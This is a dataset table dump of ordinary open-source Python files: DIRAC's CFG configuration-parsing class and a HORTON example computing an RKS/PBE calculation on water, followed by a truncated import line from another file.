| text (string, 12-1.05M chars) | repo_name (string, 5-86 chars) | path (string, 4-191 chars) | language (string, 1 class) | license (string, 15 classes) | size (int32, 12-1.05M) | keyword (list, 1-23 items) | text_hash (string, 64 chars) |
|---|---|---|---|---|---|---|---|
# $HeadURL$
__RCSID__ = "$Id$"
import types
import copy
import os
import string
import re
try:
import zipfile
gZipEnabled = True
except ImportError:
gZipEnabled = False
try:
from DIRAC.Core.Utilities import List, ThreadSafe
from DIRAC.Core.Utilities.ReturnValues import S_OK, S_ERROR
gCFGSynchro = ThreadSafe.Synchronizer( recursive = True )
except Exception:
#We're outside DIRAC, define the required utilities
import threading
from types import StringTypes
def S_ERROR( messageString = '' ):
return { 'OK' : False, 'Message' : str( messageString ) }
def S_OK( value = '' ):
return { 'OK' : True, 'Value' : value }
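# Illustrative return values for these fallback helpers (not part of the
# original file):
#   S_OK( 1 )        -> { 'OK' : True, 'Value' : 1 }
#   S_ERROR( "bad" ) -> { 'OK' : False, 'Message' : 'bad' }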
class ListDummy:
def fromChar( self, inputString, sepChar = "," ):
if not ( type( inputString ) in StringTypes and
type( sepChar ) in StringTypes and
sepChar ): # to prevent getting an empty String as argument
return None
return [ fieldString.strip() for fieldString in inputString.split( sepChar ) if len( fieldString.strip() ) > 0 ]
List = ListDummy()
class Synchronizer:
""" Class enapsulating a lock
allowing it to be used as a synchronizing
decorator making the call thread-safe"""
def __init__( self, lockName = "", recursive = False ):
self.lockName = lockName
if recursive:
self.lock = threading.RLock()
else:
self.lock = threading.Lock()
def __call__( self, funcToCall ):
def lockedFunc( *args, **kwargs ):
try:
if self.lockName:
print "LOCKING", self.lockName
self.lock.acquire()
return funcToCall( *args, **kwargs )
finally:
if self.lockName:
print "UNLOCKING", self.lockName
self.lock.release()
return lockedFunc
gCFGSynchro = Synchronizer( recursive = True )
#END OF OUT OF DIRAC
#START OF CFG MODULE
class CFG( object ):
class Template( string.Template ):
idpattern = r'[\w/]+'
def __init__( self ):
"""
Constructor
"""
self.__orderedList = []
self.__commentDict = {}
self.__dataDict = {}
self.reset()
@gCFGSynchro
def reset( self ):
"""
Empty the CFG
"""
self.__orderedList = []
self.__commentDict = {}
self.__dataDict = {}
@gCFGSynchro
def createNewSection( self, sectionName, comment = "", contents = False ):
"""
Create a new section
@type sectionName: string
@param sectionName: Name of the section
@type comment: string
@param comment: Comment for the section
@type contents: CFG
@param contents: Optional cfg with the contents of the section.
"""
if sectionName == "":
raise ValueError( "Creating a section with empty name! You shouldn't do that!" )
if sectionName.find( "/" ) > -1:
recDict = self.getRecursive( sectionName, -1 )
if not recDict:
return S_ERROR( "Parent section does not exist %s" % sectionName )
parentSection = recDict[ 'value' ]
if type( parentSection ) in ( types.StringType, types.UnicodeType ):
raise KeyError( "Entry %s doesn't seem to be a section" % recDict[ 'key' ] )
return parentSection.createNewSection( recDict[ 'levelsBelow' ], comment, contents )
self.__addEntry( sectionName, comment )
if sectionName not in self.__dataDict:
if not contents:
self.__dataDict[ sectionName ] = CFG()
else:
self.__dataDict[ sectionName ] = contents
else:
raise KeyError( "%s key already exists" % sectionName )
return self.__dataDict[ sectionName ]
def __overrideAndCloneSection( self, sectionName, oCFGToClone ):
"""
Replace the contents of a section
@type sectionName: string
@param sectionName: Name of the section
@type oCFGToClone: CFG
@param oCFGToClone: CFG with the contents of the section
"""
if sectionName not in self.listSections():
raise KeyError( "Section %s does not exist" % sectionName )
self.__dataDict[ sectionName ] = oCFGToClone.clone()
@gCFGSynchro
def setOption( self, optionName, value, comment = "" ):
"""
Create a new option.
@type optionName: string
@param optionName: Name of the option to create
@type value: string
@param value: Value of the option
@type comment: string
@param comment: Comment for the option
"""
if optionName == "":
raise ValueError( "Creating an option with empty name! You shouldn't do that!" )
if optionName.find( "/" ) > -1:
recDict = self.getRecursive( optionName, -1 )
if not recDict:
return S_ERROR( "Parent section does not exist %s" % optionName )
parentSection = recDict[ 'value' ]
if type( parentSection ) in ( types.StringType, types.UnicodeType ):
raise KeyError( "Entry %s doesn't seem to be a section" % recDict[ 'key' ] )
return parentSection.setOption( recDict[ 'levelsBelow' ], value, comment )
self.__addEntry( optionName, comment )
self.__dataDict[ optionName ] = str( value )
def __addEntry( self, entryName, comment ):
"""
Add an entry and set the comment
@type entryName: string
@param entryName: Name of the entry
@type comment: string
@param comment: Comment for the entry
"""
if not entryName in self.__orderedList:
self.__orderedList.append( entryName )
self.__commentDict[ entryName ] = comment
def existsKey( self, key ):
"""
Check if an option/section with that name exists
@type key: string
@param key: Name of the option/section to check
@return: Boolean with the result
"""
return key in self.__orderedList
def sortAlphabetically( self, ascending = True ):
"""
Order this cfg alphabetically.
Returns True if the order was modified.
"""
if not ascending:
return self.sortByKey( reverse = True )
return self.sortByKey()
def sortByKey( self, key = None , reverse = False ):
"""
Order this cfg by the function given in key; the default (None)
corresponds to an alphabetic sort.
Returns True if the order was modified.
"""
unordered = list( self.__orderedList )
self.__orderedList.sort( key = key , reverse = reverse )
return unordered != self.__orderedList
@gCFGSynchro
def deleteKey( self, key ):
"""
Delete an option/section
@type key: string
@param key: Name of the option/section to delete
@return: Boolean with the result
"""
result = self.getRecursive( key, -1 )
if not result:
raise KeyError( "%s does not exist" % "/".join( List.fromChar( key, "/" )[:-1] ) )
cfg = result[ 'value' ]
end = result[ 'levelsBelow' ]
if end in cfg.__orderedList:
del( cfg.__commentDict[ end ] )
del( cfg.__dataDict[ end ] )
cfg.__orderedList.remove( end )
return True
return False
@gCFGSynchro
def copyKey( self, oldName, newName ):
"""
Copy an option/section
@type oldName: string
@param oldName: Name of the option / section to copy
@type newName: string
@param newName: Destination name
@return: Boolean with the result
"""
if oldName == newName:
return True
result = self.getRecursive( oldName, -1 )
if not result:
raise KeyError( "%s does not exist" % "/".join( List.fromChar( oldName, "/" )[:-1] ) )
oldCfg = result[ 'value' ]
oldEnd = result[ 'levelsBelow' ]
if oldEnd in oldCfg.__dataDict:
result = self.getRecursive( newName, -1 )
if not result:
raise KeyError( "%s does not exist" % "/".join( List.fromChar( newName, "/" )[:-1] ) )
newCfg = result[ 'value' ]
newEnd = result[ 'levelsBelow' ]
newCfg.__dataDict[ newEnd ] = oldCfg.__dataDict[ oldEnd ]
newCfg.__commentDict[ newEnd ] = oldCfg.__commentDict[ oldEnd ]
refKeyPos = oldCfg.__orderedList.index( oldEnd )
newCfg.__orderedList.insert( refKeyPos + 1, newEnd )
return True
else:
return False
@gCFGSynchro
def listOptions( self, ordered = True ):
"""
List options
@type ordered: boolean
@param ordered: Return the options in definition order. True by default.
@return: List with the option names
"""
if ordered:
return [ sKey for sKey in self.__orderedList if type( self.__dataDict[ sKey ] ) == types.StringType ]
else:
return [ sKey for sKey in self.__dataDict.keys() if type( self.__dataDict[ sKey ] ) == types.StringType ]
@gCFGSynchro
def listSections( self, ordered = True ):
"""
List subsections
@type ordered: boolean
@param ordered: Return the subsections in definition order. True by default.
@return: List with the subsection names
"""
if ordered:
return [ sKey for sKey in self.__orderedList if type( self.__dataDict[ sKey ] ) != types.StringType ]
else:
return [ sKey for sKey in self.__dataDict.keys() if type( self.__dataDict[ sKey ] ) != types.StringType ]
@gCFGSynchro
def isSection( self, key ):
"""
Return whether a section with the given name exists
@type key: string
@param key: Name to check
@return: Boolean with the results
"""
if key.find( "/" ) != -1:
keyDict = self.getRecursive( key, -1 )
if not keyDict:
return False
section = keyDict[ 'value' ]
if type( section ) in ( types.StringType, types.UnicodeType ):
return False
secKey = keyDict[ 'levelsBelow' ]
return section.isSection( secKey )
return key in self.__dataDict and type( self.__dataDict[ key ] ) not in ( types.StringType, types.UnicodeType )
@gCFGSynchro
def isOption( self, key ):
"""
Return whether an option with the given name exists
@type key: string
@param key: Name to check
@return: Boolean with the results
"""
if key.find( "/" ) != -1:
keyDict = self.getRecursive( key, -1 )
if not keyDict:
return False
section = keyDict[ 'value' ]
if type( section ) in ( types.StringType, types.UnicodeType ):
return False
secKey = keyDict[ 'levelsBelow' ]
return section.isOption( secKey )
return key in self.__dataDict and type( self.__dataDict[ key ] ) == types.StringType
def listAll( self ):
"""
List all sections and options
@return: List with names of all options and subsections
"""
return self.__orderedList
def __recurse( self, pathList ):
"""
Explore recursively a path
@type pathList: list
@param pathList: List containing the path to explore
@return: Dictionary with the contents { key, value, comment }
"""
if pathList[0] in self.__dataDict:
if len( pathList ) == 1:
return { 'key' : pathList[0],
'value' : self.__dataDict[ pathList[0] ],
'comment' : self.__commentDict[ pathList[0] ] }
else:
return self.__dataDict[ pathList[0] ].__recurse( pathList[1:] )
else:
return False
@gCFGSynchro
def getRecursive( self, path, levelsAbove = 0 ):
"""
Get path contents
@type path: string
@param path: Path to explore recursively and get the contents
@type levelsAbove: integer
@param levelsAbove: Number of children levels in the path that won't be explored.
For instance, to explore all sections in a path except the last one use
levelsAbove = 1
@return: Dictionary containing:
key -> name of the entry
value -> content of the key
comment -> comment of the key
"""
pathList = [ dirName.strip() for dirName in path.split( "/" ) if not dirName.strip() == "" ]
levelsAbove = abs( levelsAbove )
if len( pathList ) - levelsAbove < 0:
return None
if len( pathList ) - levelsAbove == 0:
lBel = ""
if levelsAbove > 0:
lBel = "/".join( pathList[len( pathList ) - levelsAbove: ] )
return { 'key' : "", 'value' : self, 'comment' : "", 'levelsBelow' : lBel }
levelsBelow = ""
if levelsAbove > 0:
levelsBelow = "/".join( pathList[-levelsAbove:] )
pathList = pathList[:-levelsAbove]
retDict = self.__recurse( pathList )
if not retDict:
return None
retDict[ 'levelsBelow' ] = levelsBelow
return retDict
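# Illustrative sketch (not part of the original file): for a CFG holding a
# section "DIRAC" that contains an option "Setup = Prod":
#   cfg.getRecursive( "DIRAC/Setup" )
#     -> { 'key' : 'Setup', 'value' : 'Prod', 'comment' : '', 'levelsBelow' : '' }
#   cfg.getRecursive( "DIRAC/Setup", -1 )
#     -> { 'key' : 'DIRAC', 'value' : <CFG>, 'comment' : '', 'levelsBelow' : 'Setup' }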
def getOption( self, opName, defaultValue = None ):
"""
Get option value with default applied
@type opName: string
@param opName: Path to the option to retrieve
@type defaultValue: optional (any python type)
@param defaultValue: Default value for the option if the option is not defined.
If the option is defined and defaultValue is given, the value
will be returned cast to the type of defaultValue.
@return: Value of the option cast to defaultValue's type, or defaultValue
"""
levels = List.fromChar( opName, "/" )
dataD = self.__dataDict
while len( levels ) > 0:
try:
dataV = dataD[ levels.pop( 0 ) ]
except KeyError:
return defaultValue
dataD = dataV
if type( dataV ) != types.StringType:
optionValue = defaultValue
else:
optionValue = dataV
#Return value if existing, defaultValue if not
if optionValue == defaultValue:
if defaultValue == None or type( defaultValue ) == types.TypeType:
return defaultValue
return optionValue
#Value has been returned from the configuration
if defaultValue == None:
return optionValue
#Casting to defaultValue's type
defaultType = defaultValue
if not type( defaultValue ) == types.TypeType:
defaultType = type( defaultValue )
if defaultType == types.ListType:
try:
return List.fromChar( optionValue, ',' )
except Exception:
return defaultValue
elif defaultType == types.BooleanType:
try:
return optionValue.lower() in ( "y", "yes", "true", "1" )
except Exception:
return defaultValue
else:
try:
return defaultType( optionValue )
except Exception:
return defaultValue
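# Illustrative casting behaviour (not part of the original file), assuming an
# option "level = 5" exists:
#   cfg.getOption( "level" )       -> "5"    (no default: raw string)
#   cfg.getOption( "level", 0 )    -> 5      (cast to the default's type, int)
#   cfg.getOption( "level", [] )   -> ["5"]  (lists are split via List.fromChar)
#   cfg.getOption( "missing", 42 ) -> 42     (undefined option: default returned)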
def getAsDict( self, path = "" ):
"""
Get the contents below a given path as a dict
@type path: string
@param path: Path to retrieve as dict
@return : Dictionary containing the data
"""
resVal = {}
if path:
reqDict = self.getRecursive( path )
if not reqDict:
return resVal
keyCfg = reqDict[ 'value' ]
if type( keyCfg ) in ( types.StringType, types.UnicodeType ):
return resVal
return keyCfg.getAsDict()
for op in self.listOptions():
resVal[ op ] = self[ op ]
for sec in self.listSections():
resVal[ sec ] = self[ sec ].getAsDict()
return resVal
@gCFGSynchro
def appendToOption( self, optionName, value ):
"""
Append a value to an option (the value should include any separator, e.g. a leading comma)
@type optionName: string
@param optionName: Name of the option to append the value
@type value: string
@param value: Value to append to the option
"""
result = self.getRecursive( optionName, -1 )
if not result:
raise KeyError( "%s does not exist" % "/".join( List.fromChar( optionName, "/" )[:-1] ) )
cfg = result[ 'value' ]
end = result[ 'levelsBelow' ]
if end not in cfg.__dataDict:
raise KeyError( "Option %s has not been declared" % end )
cfg.__dataDict[ end ] += str( value )
@gCFGSynchro
def addKey( self, key, value, comment, beforeKey = "" ):
"""
Add a new entry (option or section)
@type key: string
@param key: Name of the option/section to add
@type value: string/CFG
@param value: Contents of the new option/section
@type comment: string
@param comment: Comment for the option/section
@type beforeKey: string
@param beforeKey: Name of the option/section to add the entry above. By default
the new entry will be added at the end.
"""
result = self.getRecursive( key, -1 )
if not result:
raise KeyError( "%s does not exist" % "/".join( List.fromChar( key, "/" )[:-1] ) )
cfg = result[ 'value' ]
end = result[ 'levelsBelow' ]
if end in cfg.__dataDict:
raise KeyError( "%s already exists" % key )
cfg.__dataDict[ end ] = value
cfg.__commentDict[ end ] = comment
if beforeKey == "":
cfg.__orderedList.append( end )
else:
refKeyPos = cfg.__orderedList.index( beforeKey )
cfg.__orderedList.insert( refKeyPos, end )
@gCFGSynchro
def renameKey( self, oldName, newName ):
"""
Rename a option/section
@type oldName: string
@param oldName: Name of the option/section to change
@type newName: string
@param newName: New name of the option/section
@return: Boolean with the result of the rename
"""
if oldName == newName:
return True
result = self.getRecursive( oldName, -1 )
if not result:
raise KeyError( "%s does not exist" % "/".join( List.fromChar( oldName, "/" )[:-1] ) )
oldCfg = result[ 'value' ]
oldEnd = result[ 'levelsBelow' ]
if oldEnd in oldCfg.__dataDict:
result = self.getRecursive( newName, -1 )
if not result:
raise KeyError( "%s does not exist" % "/".join( List.fromChar( newName, "/" )[:-1] ) )
newCfg = result[ 'value' ]
newEnd = result[ 'levelsBelow' ]
newCfg.__dataDict[ newEnd ] = oldCfg.__dataDict[ oldEnd ]
newCfg.__commentDict[ newEnd ] = oldCfg.__commentDict[ oldEnd ]
refKeyPos = oldCfg.__orderedList.index( oldEnd )
oldCfg.__orderedList.remove( oldEnd )
newCfg.__orderedList.insert( refKeyPos, newEnd )
del( oldCfg.__dataDict[ oldEnd ] )
del( oldCfg.__commentDict[ oldEnd ] )
return True
else:
return False
def __getitem__( self, key ):
"""
Get the contents of a section/option
@type key: string
@param key: Name of the section/option to retrieve
@return: String/CFG with the contents
"""
if key.find( "/" ) > -1:
subDict = self.getRecursive( key )
if not subDict:
return False
return subDict[ 'value' ]
return self.__dataDict[ key ]
def __iter__( self ):
"""
Iterate through the contents in order
"""
for key in self.__orderedList:
yield key
def __contains__( self, key ):
"""
Check if a key is defined
"""
return self.getRecursive( key )
def __str__( self ):
"""
Get a print friendly representation of the CFG
@return: String with the contents of the CFG
"""
return self.serialize()
def __repr__( self ):
"""
Get a print friendly representation of the CFG
@return: String with the contents of the CFG
"""
return self.serialize()
def __nonzero__( self ):
"""
CFGs are not zeroes! ;)
"""
return True
def __eq__( self, cfg ):
"""
Check two CFGs for equality
"""
if not self.__orderedList == cfg.__orderedList:
return False
for key in self.__orderedList:
if not self.__commentDict[ key ].strip() == cfg.__commentDict[ key ].strip():
return False
if not self.__dataDict[ key ] == cfg.__dataDict[ key ]:
return False
return True
@gCFGSynchro
def getComment( self, entryName ):
"""
Get the comment for an option/section
@type entryName: string
@param entryName: Name of the option/section
@return: String with the comment
"""
try:
return self.__commentDict[ entryName ]
except KeyError:
raise ValueError( "%s does not have any comment defined" % entryName )
@gCFGSynchro
def setComment( self, entryName, comment ):
"""
Set the comment for an option/section
@type entryName: string
@param entryName: Name of the option/section
@type comment: string
@param comment: Comment for the option/section
"""
if entryName in self.__orderedList:
self.__commentDict[ entryName ] = comment
return True
return False
@gCFGSynchro
def serialize( self, tabLevelString = "" ):
"""
Generate a human readable serialization of a CFG
@type tabLevelString: string
@param tabLevelString: Tab string to apply to entries before representing them
@return: String with the contents of the CFG
"""
indentation = " "
cfgString = ""
for entryName in self.__orderedList:
if entryName in self.__commentDict:
for commentLine in List.fromChar( self.__commentDict[ entryName ], "\n" ):
cfgString += "%s#%s\n" % ( tabLevelString, commentLine )
if entryName in self.listSections():
cfgString += "%s%s\n%s{\n" % ( tabLevelString, entryName, tabLevelString )
cfgString += self.__dataDict[ entryName ].serialize( "%s%s" % ( tabLevelString, indentation ) )
cfgString += "%s}\n" % tabLevelString
elif entryName in self.listOptions():
valueList = List.fromChar( self.__dataDict[ entryName ] )
if len( valueList ) == 0:
cfgString += "%s%s = \n" % ( tabLevelString, entryName )
else:
cfgString += "%s%s = %s\n" % ( tabLevelString, entryName, valueList[0] )
for value in valueList[1:]:
cfgString += "%s%s += %s\n" % ( tabLevelString, entryName, value )
else:
raise ValueError( "Oops. There is an entry in the order which is not a section nor an option" )
return cfgString
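# Illustrative serialized output (not part of the original file; indentation
# approximate) for a CFG with a commented section "Systems" holding the
# option "Retries = 3, 5":
#   #systems comment
#   Systems
#   {
#     Retries = 3
#     Retries += 5
#   }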
@gCFGSynchro
def clone( self ):
"""
Create a copy of the CFG
@return: CFG copy
"""
clonedCFG = CFG()
clonedCFG.__orderedList = copy.deepcopy( self.__orderedList )
clonedCFG.__commentDict = copy.deepcopy( self.__commentDict )
for option in self.listOptions():
clonedCFG.__dataDict[ option ] = self[ option ]
for section in self.listSections():
clonedCFG.__dataDict[ section ] = self[ section ].clone()
return clonedCFG
@gCFGSynchro
def mergeWith( self, cfgToMergeWith ):
"""
Generate a CFG by merging with the contents of another CFG.
@type cfgToMergeWith: CFG
@param cfgToMergeWith: CFG with the contents to merge with. Its contents take
precedence over the contents of this CFG.
@return: CFG with the result of the merge
"""
mergedCFG = CFG()
for option in self.listOptions():
mergedCFG.setOption( option,
self[ option ],
self.getComment( option ) )
for option in cfgToMergeWith.listOptions():
mergedCFG.setOption( option,
cfgToMergeWith[ option ],
cfgToMergeWith.getComment( option ) )
for section in self.listSections():
if section in cfgToMergeWith.listSections():
oSectionCFG = self[ section ].mergeWith( cfgToMergeWith[ section ] )
mergedCFG.createNewSection( section,
cfgToMergeWith.getComment( section ),
oSectionCFG )
else:
mergedCFG.createNewSection( section,
self.getComment( section ),
self[ section ].clone() )
for section in cfgToMergeWith.listSections():
if section not in self.listSections():
mergedCFG.createNewSection( section,
cfgToMergeWith.getComment( section ),
cfgToMergeWith[ section ] )
return mergedCFG
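# Illustrative merge semantics (not part of the original file): options present
# in both CFGs take the value from cfgToMergeWith, e.g.
#   self:           x = 1, y = 2
#   cfgToMergeWith: y = 9, z = 3
#   merged result:  x = 1, y = 9, z = 3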
def getModifications( self, newerCfg, ignoreMask = None, parentPath = "" ):
"""
Compare two cfgs
@type newerCfg: CFG
@param newerCfg: Cfg to compare with
@type ignoreMask: list
@param ignoreMask: List of paths to ignore in the comparison
@type parentPath: string
@param parentPath: Internal use only
@return: A list of modifications
"""
modList = []
#Options
oldOptions = self.listOptions( True )
newOptions = newerCfg.listOptions( True )
for newOption in newOptions:
iPos = newerCfg.__orderedList.index( newOption )
newOptPath = "%s/%s" % ( parentPath, newOption )
if ignoreMask and newOptPath in ignoreMask:
continue
if newOption not in oldOptions:
modList.append( ( 'addOpt', newOption, iPos,
newerCfg[ newOption ],
newerCfg.getComment( newOption ) ) )
else:
modified = False
if iPos != self.__orderedList.index( newOption ):
modified = True
elif newerCfg[ newOption ] != self[ newOption ]:
modified = True
elif newerCfg.getComment( newOption ) != self.getComment( newOption ):
modified = True
if modified:
modList.append( ( 'modOpt', newOption, iPos,
newerCfg[ newOption ],
newerCfg.getComment( newOption ) ) )
for oldOption in oldOptions:
oldOptPath = "%s/%s" % ( parentPath, oldOption )
if ignoreMask and oldOptPath in ignoreMask:
continue
if oldOption not in newOptions:
modList.append( ( 'delOpt', oldOption, -1, '' ) )
#Sections
oldSections = self.listSections( True )
newSections = newerCfg.listSections( True )
for newSection in newSections:
iPos = newerCfg.__orderedList.index( newSection )
newSecPath = "%s/%s" % ( parentPath, newSection )
if ignoreMask and newSecPath in ignoreMask:
continue
if newSection not in oldSections:
modList.append( ( 'addSec', newSection, iPos,
str( newerCfg[ newSection ] ),
newerCfg.getComment( newSection ) ) )
else:
modified = False
if iPos != self.__orderedList.index( newSection ):
modified = True
elif newerCfg.getComment( newSection ) != self.getComment( newSection ):
modified = True
subMod = self[ newSection ].getModifications( newerCfg[ newSection ],
ignoreMask, newSecPath )
if subMod:
modified = True
if modified:
modList.append( ( 'modSec', newSection, iPos,
subMod,
newerCfg.getComment( newSection ) ) )
for oldSection in oldSections:
oldSecPath = "%s/%s" % ( parentPath, oldSection )
if ignoreMask and oldSecPath in ignoreMask:
continue
if oldSection not in newSections:
modList.append( ( 'delSec', oldSection, -1, '' ) )
return modList
def applyModifications( self, modList, parentSection = "" ):
"""
Apply modifications to a CFG
@type modList: List
@param modList: Modifications from a getModifications call
@return: True/False
"""
for modAction in modList:
action = modAction[0]
key = modAction[1]
iPos = modAction[2]
value = modAction[3]
if action == 'addSec':
if key in self.listSections():
return S_ERROR( "Section %s/%s already exists" % ( parentSection, key ) )
#key, value, comment, beforeKey = ""
value = CFG().loadFromBuffer( value )
comment = modAction[4].strip()
if iPos < len( self.__orderedList ):
beforeKey = self.__orderedList[ iPos ]
else:
beforeKey = ""
self.addKey( key, value, comment, beforeKey )
elif action == 'delSec':
if key not in self.listSections():
return S_ERROR( "Section %s/%s does not exist" % ( parentSection, key ) )
self.deleteKey( key )
elif action == 'modSec':
if key not in self.listSections():
return S_ERROR( "Section %s/%s does not exist" % ( parentSection, key ) )
comment = modAction[4].strip()
self.setComment( key, comment )
if value:
result = self[ key ].applyModifications( value, "%s/%s" % ( parentSection, key ) )
if not result[ 'OK' ]:
return result
if iPos >= len( self.__orderedList ) or key != self.__orderedList[ iPos ]:
prevPos = self.__orderedList.index( key )
del( self.__orderedList[ prevPos ] )
self.__orderedList.insert( iPos, key )
elif action == "addOpt":
if key in self.listOptions():
return S_ERROR( "Option %s/%s exists already" % ( parentSection, key ) )
#key, value, comment, beforeKey = ""
comment = modAction[4].strip()
if iPos < len( self.__orderedList ):
beforeKey = self.__orderedList[ iPos ]
else:
beforeKey = ""
self.addKey( key, value, comment, beforeKey )
elif action == "modOpt":
if key not in self.listOptions():
return S_ERROR( "Option %s/%s does not exist" % ( parentSection, key ) )
comment = modAction[4].strip()
self.setOption( key , value, comment )
if iPos >= len( self.__orderedList ) or key != self.__orderedList[ iPos ]:
prevPos = self.__orderedList.index( key )
del( self.__orderedList[ prevPos ] )
self.__orderedList.insert( iPos, key )
elif action == "delOpt":
if key not in self.listOptions():
return S_ERROR( "Option %s/%s does not exist" % ( parentSection, key ) )
self.deleteKey( key )
return S_OK()
#Functions to load a CFG
def loadFromFile( self, fileName ):
"""
Load the contents of the CFG from a file
@type fileName: string
@param fileName: File name to load the contents from
@return: This CFG
"""
if gZipEnabled and fileName.find( ".zip" ) == len( fileName ) - 4:
#Zipped file
zipHandler = zipfile.ZipFile( fileName )
nameList = zipHandler.namelist()
fileToRead = nameList[0]
fileData = zipHandler.read( fileToRead )
zipHandler.close()
else:
fd = file( fileName )
fileData = fd.read()
fd.close()
return self.loadFromBuffer( fileData )
@gCFGSynchro
def loadFromBuffer( self, data ):
"""
Load the contents of the CFG from a string
@type data: string
@param data: Contents of the CFG
@return: This CFG
"""
commentRE = re.compile( r"^\s*#" )
self.reset()
levelList = []
currentLevel = self
currentlyParsedString = ""
currentComment = ""
for line in data.split( "\n" ):
line = line.strip()
if len( line ) < 1:
continue
if commentRE.match( line ):
currentComment += "%s\n" % line.replace( "#", "" )
continue
for index in range( len( line ) ):
if line[ index ] == "{":
currentlyParsedString = currentlyParsedString.strip()
currentLevel.createNewSection( currentlyParsedString, currentComment )
levelList.append( currentLevel )
currentLevel = currentLevel[ currentlyParsedString ]
currentlyParsedString = ""
currentComment = ""
elif line[ index ] == "}":
currentLevel = levelList.pop()
elif line[ index ] == "=":
lFields = line.split( "=" )
currentLevel.setOption( lFields[0].strip(),
"=".join( lFields[1:] ).strip(),
currentComment )
currentlyParsedString = ""
currentComment = ""
break
elif line[ index: index + 2 ] == "+=":
valueList = line.split( "+=" )
currentLevel.appendToOption( valueList[0].strip(), ", %s" % "+=".join( valueList[1:] ).strip() )
currentlyParsedString = ""
currentComment = ""
break
else:
currentlyParsedString += line[ index ]
return self
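# Illustrative buffer syntax accepted by loadFromBuffer (not part of the
# original file):
#   #comment attached to Section
#   Section
#   {
#     option = value
#     option += appendedValue
#   }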
@gCFGSynchro
def loadFromDict( self, data ):
for k in data:
value = data[ k ]
vType = type( value )
if type( value ) == types.DictType:
self.createNewSection( k , "", CFG().loadFromDict( value ) )
elif vType in ( types.ListType, types.TupleType ):
self.setOption( k , ", ".join( value ), "" )
else:
self.setOption( k , str( value ), "" )
return self
def writeToFile( self, fileName ):
"""
Write the contents of the cfg to file
@type fileName: string
@param fileName: Name of the file to write the cfg to
@return: True/False
"""
try:
directory = os.path.dirname( fileName )
if directory and ( not os.path.exists( directory ) ):
os.makedirs( directory )
fd = file( fileName, "w" )
fd.write( str( self ) )
fd.close()
return True
except Exception:
return False
def __allOps( self ):
toExplore = [ ( "", self ) ]
while toExplore:
sPath, sObj = toExplore.pop( 0 )
if sPath:
sPath = "%s/" % sPath
for opName in sObj.listOptions():
yield ( sPath + opName, sObj[ opName ] )
for secName in sObj.listSections():
toExplore.append( ( sPath + secName, sObj[ secName ] ) )
#Real expansion method
def __innerExpand( self ):
done = {}
for secName in self.listSections():
secDone = self[ secName ].__innerExpand()
for k in secDone:
done[ "%s/%s" % ( secName, k ) ] = secDone[ k ]
toExpand = {}
for opName in self.listOptions():
opValue = self[ opName ]
if opValue.find( CFG.Template.delimiter ) == -1:
done[ opName ] = opValue
continue
toExpand[ opName ] = opValue
modifications = 0
while True:
modified = {}
for opName in toExpand:
try:
newVal = CFG.Template( toExpand[ opName ] ).substitute( done )
except Exception:
continue
modified[ opName ] = newVal
done[ opName ] = newVal
self.setOption( opName, newVal )
modifications += 1
if not modified:
break
for opN in modified:
toExpand.pop( opN )
return done
@gCFGSynchro
def expand( self ):
"""
Expand all options into themselves
a = something-$b
b = hello
will end up with
a = something-hello
b = hello
"""
self.__innerExpand()
return self
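# Minimal usage sketch (not part of the original module; the buffer below is
# purely illustrative):
if __name__ == "__main__":
  demoCfg = CFG().loadFromBuffer( "#demo comment\n"
                                  "Section\n"
                                  "{\n"
                                  "  a = something-$b\n"
                                  "  b = hello\n"
                                  "}\n" )
  print demoCfg.getOption( "Section/a", "" ) # -> something-$b
  demoCfg.expand()
  print demoCfg.getOption( "Section/a", "" ) # -> something-hello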
| coberger/DIRAC | Core/Utilities/CFG.py | Python | gpl-3.0 | 33,826 | ["DIRAC"] | 559848d5c6ddf08acd21206a4a62871dbd91ede4294f3f22e383e843b0354cac |
#!/usr/bin/env python
#JSON {"lot": "RKS/6-31G*",
#JSON "scf": "CDIISSCFSolver",
#JSON "linalg": "CholeskyLinalgFactory",
#JSON "difficulty": 4,
#JSON "description": "Basic RKS DFT example with GGA exhange-correlation functional (PBE)"}
from horton import *
# Load the coordinates from file.
# Use the XYZ file from HORTON's test data directory.
fn_xyz = context.get_fn('test/water.xyz')
mol = IOData.from_file(fn_xyz)
# Create a Gaussian basis set
obasis = get_gobasis(mol.coordinates, mol.numbers, '6-31g*')
# Create a linalg factory
lf = CholeskyLinalgFactory(obasis.nbasis)
# Compute Gaussian integrals
olp = obasis.compute_overlap(lf)
kin = obasis.compute_kinetic(lf)
na = obasis.compute_nuclear_attraction(mol.coordinates, mol.pseudo_numbers, lf)
er = obasis.compute_electron_repulsion(lf)
# Define a numerical integration grid needed for the XC functionals
grid = BeckeMolGrid(mol.coordinates, mol.numbers, mol.pseudo_numbers)
# Create alpha orbitals
exp_alpha = lf.create_expansion()
# Initial guess
guess_core_hamiltonian(olp, kin, na, exp_alpha)
# Construct the restricted Kohn-Sham effective Hamiltonian
external = {'nn': compute_nucnuc(mol.coordinates, mol.pseudo_numbers)}
terms = [
RTwoIndexTerm(kin, 'kin'),
RDirectTerm(er, 'hartree'),
RGridGroup(obasis, grid, [
RLibXCGGA('x_pbe'),
RLibXCGGA('c_pbe'),
]),
RTwoIndexTerm(na, 'ne'),
]
ham = REffHam(terms, external)
# Decide how to occupy the orbitals (5 alpha electrons)
occ_model = AufbauOccModel(5)
# Converge WFN with CDIIS SCF
# - Construct the initial density matrix (needed for CDIIS).
occ_model.assign(exp_alpha)
dm_alpha = exp_alpha.to_dm()
# - SCF solver
scf_solver = CDIISSCFSolver(1e-6)
scf_solver(ham, lf, olp, occ_model, dm_alpha)
# Derive orbitals (coeffs, energies and occupations) from the Fock and density
# matrices. The energy is also computed to store it in the output file below.
fock_alpha = lf.create_two_index()
ham.reset(dm_alpha)
ham.compute_energy()
ham.compute_fock(fock_alpha)
exp_alpha.from_fock_and_dm(fock_alpha, dm_alpha, olp)
# Assign results to the molecule object and write it to a file, e.g. for
# later analysis. Note that the CDIIS algorithm really only constructs an
# optimized density matrix, not orbitals.
mol.title = 'RKS computation on water'
mol.energy = ham.cache['energy']
mol.obasis = obasis
mol.exp_alpha = exp_alpha
mol.dm_alpha = dm_alpha
# useful for post-processing (results stored in double precision):
mol.to_file('water.h5')
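# A possible follow-up sketch (hypothetical; assumes IOData.from_file can also
# read the HDF5 file written above):
#   mol_again = IOData.from_file('water.h5')
#   print mol_again.energy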
| crisely09/horton | data/examples/hf_dft/rks_water_gga.py | Python | gpl-3.0 | 2,495 | ["Gaussian"] | 55ec9130ec4c001ce6c88fae67513e44913f816e9fc48176f1559b4dd9dcbd4a |
import copy
from .meta_parse import fbool, fint, fintlist, func_types, lcstr
